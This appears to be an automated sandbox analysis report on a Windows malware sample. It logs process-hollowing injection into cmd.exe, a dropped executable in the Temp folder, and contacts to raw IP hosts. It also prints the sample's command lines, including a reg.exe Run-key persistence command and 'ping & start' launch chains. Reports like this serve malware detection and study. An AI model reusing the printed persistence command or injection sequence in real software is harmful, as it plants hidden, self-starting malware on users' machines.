Communicates with host for which no DNS query was performed (2 events)

host	34.212.193.150
host	8.8.7.7

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 2, 2021, 10:45 a.m.	process_identifier: 3060 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000049d60000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0x0000000000000358	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\L6BC9S31KAU

reg_value

cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v J7VKJT64 /t REG_SZ /d "C:\Users\test22\AppData\Local\Temp\RT4B706.exe NICE" & start "H" C:\Users\test22\AppData\Local\Temp\RT4B706.exe NICE

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\RT4B706.exe

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: MZÿÿ¸@غ´ Í!¸ LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð"Î $Ô!ÖI `ƒ p°à .textÊÍ Î  `.rdataà Ò @@.dataÂð Ú @À.pdatapÜ @@ base_address: 0x0000000049d60000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$ ¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`   b0p`à  R   10P p `ÀÐàð   E0P p `ÀÐàð b0Pp`àð  ¢0P p `ÀÐàð bp `  b0P p `ÀÐàð  ’0Pp`à   W0P p `ÀÐàð   0P p `ÀÐàð ¢0Pp`àð   0P p `ÀÐàð "0Pp`àð   0P p `ÀÐàð  0Pp`à  ’0P p `ÀÐàð Ò0p `   =0P p `ÀÐàð  â0P p `ÀÐàð  ‚0P p `ÀÐàð   '0P p `ÀÐàð 0p ` p ` 20p `  B   0P p `ÀÐàð   0P p `ÀÐàð h +0P p `ÀÐàð " `   50P p `ÀÐàð    R0P p `ÀÐàð  B0p`à ’ 0 Pp`Ààð h  0P p `ÀÐàð   0P p `ÀÐàð R0p ` b0Pp `   0P p `ÀÐàð  Â0P p `ÀÐàð h ;0P p `ÀÐàð 0P p `ÀÐàð R ` Âp `  " 0Pp ` 0Pp `  "0Pp`à "0p ` R 0 Pp`Ààð  R0Pp`à ’0p ` Bp ` 2 `  00Pp`à hâ0P p `ÀÐàð h 70P p `ÀÐàð h #0P p `ÀÐàð  r0Pp`à  p `   %0P p `ÀÐàð  p `  p `  ¢0p`à  B 0p`Ààð   O0P p `ÀÐàð ‚0Pp `   +0P p `ÀÐàð r `  ‚0p`à   ó0P p `ÀÐàð base_address: 0x0000000049d7e000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: base_address: 0x0000000049d7f000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: ÃÌà ÃPÔà Päà Ò!ìà Ü!M*á P*¤+á ¤+-0á -¦-Há ¦-G0Üã G0¾1Tá ¾1 6Üã 6›6lá ›6(;ã (;_|á _¥d”á ¥dhPâ h,j¬á ,j‰yÀá ‰y2{Tá 2{ ~Øá ~ºìá ºÚƒâ ڃnˆâ nˆâ‰hâ â‰É‹,â ɋ\¡8â \¡¶¨”á ¶¨¹«Pâ ¹«­h⠭̲ã ̲ɀâ ɎÍÄã ŽÍ ÔÄå Ô0՘â 0ÕÇÕ(ä ÇÕJÖ¤â JÖÖÖ¤â ÖÖ¿Ø`ã ¿ØÜÜìá ÜÜNÝ°â NÝ]ÞHá `Þá0á á)á¼â )áÀêÄâ ÀêìÌà ìóÜâ óeö0á eö_ÿôâ `ÿ* ã * ˜ ¼â ¨ t ã t H 0ã H Š 8㠊 Ó Pã Ó z `ã z ˜! t㠘! ç! Pã ç! Û' Pâ Ü' æ+ ã æ+ . Üã . ´. ¨ã ´. / ´ã / Ù3 Äã Ù3 Ô5 Üã Ô5 ”G ô㠔G €H ä €H üH (ä üH xI 0ã xI FJ 0ä ‰J ±K tä ±K ~L <ä ~L øM Dä øM ÀP Üã ÀP ³R Tä ´R €S ˜â €S }T dä }T FV tä FV ÌV °â ÌV ÍW €ä ÍW ÃX ”ä ÃX UY ¤ä UY ¿Y °ä ¿Y øY ¼ä øY Ø[ Tá Ø[ Õa Ää Õa #e Øä #e ¾g Üã ¾g ˆq ôä ˆq ëv å ëv Îw ,å Îw x ,å x {y ,å {y _} ìá _} €~ <å €~ °ƒ Hå °ƒ † `å † ¶‡ lå ¶‡ vˆ xå vˆ ‰ ˆå ‰ 0¬ œå 0¬ ® Ü㠐® ± 8ã ± b± ¼â b± þ² ´å þ² Qµ Äå Qµ )¸ 0á )¸ ?» Pâ ?» <Á ã <Á Ô Tá Ô qÉ Üå qÉ »É ¨ã »É Ê ¨ã Ê JÊ Pã LÊ žË äå žË êÏ Pâ êÏ ÉÝ ôå base_address: 0x0000000049d81000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: MZÿÿ¸@غ´ Í!¸ LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð"Î $Ô!ÖI `ƒ p°à .textÊÍ Î  `.rdataà Ò @@.dataÂð Ú @À.pdatapÜ @@ base_address: 0x0000000049d60000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Process injection	Process 2200 called NtSetContextThread to modify thread in remote process 3060
Time & API	Arguments	Status	Return	Repeated
NtSetContextThread April 2, 2021, 10:45 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 1238770132 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 2751320 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092866560 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000000f8 process_identifier: 3060	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Process injection	Process 1756 resumed a thread in remote process 1120
Process injection	Process 1572 resumed a thread in remote process 2244
Process injection	Process 2364 resumed a thread in remote process 2200
Process injection	Process 2200 resumed a thread in remote process 3060
Time & API	Arguments	Status	Return	Repeated
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 1120	1	0	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 2244	1	0	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 2200	1	0	0
NtResumeThread April 2, 2021, 10:45 a.m.	thread_handle: 0x00000000000000f8 suspend_count: 1 process_identifier: 3060	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (26 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 1160 thread_handle: 0x00000000000000ec process_identifier: 1756 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000f0	1	1	0
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 1332 thread_handle: 0x0000000000000060 process_identifier: 2256 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1	0
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 2408 thread_handle: 0x0000000000000064 process_identifier: 1120 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5 filepath_r: C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1	0
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 1120	1	0	0
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 2256	1	0	0
CreateProcessInternalW April 2, 2021, 10:36 a.m.	thread_identifier: 2564 thread_handle: 0x00000000000000c4 process_identifier: 1572 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000ec	1	1	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 2332 thread_handle: 0x0000000000000060 process_identifier: 2776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 2264 thread_handle: 0x0000000000000064 process_identifier: 2244 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\RT4B706.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K filepath_r: C:\Users\test22\AppData\Local\Temp\RT4B706.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 2244	1	0	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 2776	1	0	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 804 thread_handle: 0x00000000000000ec process_identifier: 2364 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000f0	1	1	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 492 thread_handle: 0x0000000000000060 process_identifier: 2324 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 1160 thread_handle: 0x0000000000000064 process_identifier: 2200 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\RT4B706.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE filepath_r: C:\Users\test22\AppData\Local\Temp\RT4B706.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 2200	1	0	0
NtResumeThread April 2, 2021, 10:44 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2324	1	0	0
CreateProcessInternalW April 2, 2021, 10:45 a.m.	thread_identifier: 2296 thread_handle: 0x00000000000000f8 process_identifier: 3060 current_directory: filepath: track: 1 command_line: cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 20 (CREATE_NEW_CONSOLE|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000358	1	1	0
NtGetContextThread April 2, 2021, 10:45 a.m.	thread_handle: 0x00000000000000f8	1	0	0
NtUnmapViewOfSection April 2, 2021, 10:45 a.m.	base_address: 0x0000000049d60000 region_size: 4096 process_identifier: 3060 process_handle: 0x0000000000000358	1	0	0
NtAllocateVirtualMemory April 2, 2021, 10:45 a.m.	process_identifier: 3060 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000049d60000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0x0000000000000358	1	0	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: MZÿÿ¸@غ´ Í!¸ LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†9”e`ð"Î $Ô!ÖI `ƒ p°à .textÊÍ Î  `.rdataà Ò @@.dataÂð Ú @À.pdatapÜ @@ base_address: 0x0000000049d60000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: base_address: 0x0000000049d61000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$ ¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$9”e`   b0p`à  R   10P p `ÀÐàð   E0P p `ÀÐàð b0Pp`àð  ¢0P p `ÀÐàð bp `  b0P p `ÀÐàð  ’0Pp`à   W0P p `ÀÐàð   0P p `ÀÐàð ¢0Pp`àð   0P p `ÀÐàð "0Pp`àð   0P p `ÀÐàð  0Pp`à  ’0P p `ÀÐàð Ò0p `   =0P p `ÀÐàð  â0P p `ÀÐàð  ‚0P p `ÀÐàð   '0P p `ÀÐàð 0p ` p ` 20p `  B   0P p `ÀÐàð   0P p `ÀÐàð h +0P p `ÀÐàð " `   50P p `ÀÐàð    R0P p `ÀÐàð  B0p`à ’ 0 Pp`Ààð h  0P p `ÀÐàð   0P p `ÀÐàð R0p ` b0Pp `   0P p `ÀÐàð  Â0P p `ÀÐàð h ;0P p `ÀÐàð 0P p `ÀÐàð R ` Âp `  " 0Pp ` 0Pp `  "0Pp`à "0p ` R 0 Pp`Ààð  R0Pp`à ’0p ` Bp ` 2 `  00Pp`à hâ0P p `ÀÐàð h 70P p `ÀÐàð h #0P p `ÀÐàð  r0Pp`à  p `   %0P p `ÀÐàð  p `  p `  ¢0p`à  B 0p`Ààð   O0P p `ÀÐàð ‚0Pp `   +0P p `ÀÐàð r `  ‚0p`à   ó0P p `ÀÐàð base_address: 0x0000000049d7e000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: base_address: 0x0000000049d7f000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
WriteProcessMemory April 2, 2021, 10:45 a.m.	buffer: ÃÌà ÃPÔà Päà Ò!ìà Ü!M*á P*¤+á ¤+-0á -¦-Há ¦-G0Üã G0¾1Tá ¾1 6Üã 6›6lá ›6(;ã (;_|á _¥d”á ¥dhPâ h,j¬á ,j‰yÀá ‰y2{Tá 2{ ~Øá ~ºìá ºÚƒâ ڃnˆâ nˆâ‰hâ â‰É‹,â ɋ\¡8â \¡¶¨”á ¶¨¹«Pâ ¹«­h⠭̲ã ̲ɀâ ɎÍÄã ŽÍ ÔÄå Ô0՘â 0ÕÇÕ(ä ÇÕJÖ¤â JÖÖÖ¤â ÖÖ¿Ø`ã ¿ØÜÜìá ÜÜNÝ°â NÝ]ÞHá `Þá0á á)á¼â )áÀêÄâ ÀêìÌà ìóÜâ óeö0á eö_ÿôâ `ÿ* ã * ˜ ¼â ¨ t ã t H 0ã H Š 8㠊 Ó Pã Ó z `ã z ˜! t㠘! ç! Pã ç! Û' Pâ Ü' æ+ ã æ+ . Üã . ´. ¨ã ´. / ´ã / Ù3 Äã Ù3 Ô5 Üã Ô5 ”G ô㠔G €H ä €H üH (ä üH xI 0ã xI FJ 0ä ‰J ±K tä ±K ~L <ä ~L øM Dä øM ÀP Üã ÀP ³R Tä ´R €S ˜â €S }T dä }T FV tä FV ÌV °â ÌV ÍW €ä ÍW ÃX ”ä ÃX UY ¤ä UY ¿Y °ä ¿Y øY ¼ä øY Ø[ Tá Ø[ Õa Ää Õa #e Øä #e ¾g Üã ¾g ˆq ôä ˆq ëv å ëv Îw ,å Îw x ,å x {y ,å {y _} ìá _} €~ <å €~ °ƒ Hå °ƒ † `å † ¶‡ lå ¶‡ vˆ xå vˆ ‰ ˆå ‰ 0¬ œå 0¬ ® Ü㠐® ± 8ã ± b± ¼â b± þ² ´å þ² Qµ Äå Qµ )¸ 0á )¸ ?» Pâ ?» <Á ã <Á Ô Tá Ô qÉ Üå qÉ »É ¨ã »É Ê ¨ã Ê JÊ Pã LÊ žË äå žË êÏ Pâ êÏ ÉÝ ôå base_address: 0x0000000049d81000 process_identifier: 3060 process_handle: 0x0000000000000358	1	1	0
NtSetContextThread April 2, 2021, 10:45 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 1238770132 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 2751320 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092866560 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000000f8 process_identifier: 3060	1	0	0
NtResumeThread April 2, 2021, 10:45 a.m.	thread_handle: 0x00000000000000f8 suspend_count: 1 process_identifier: 3060	1	0	0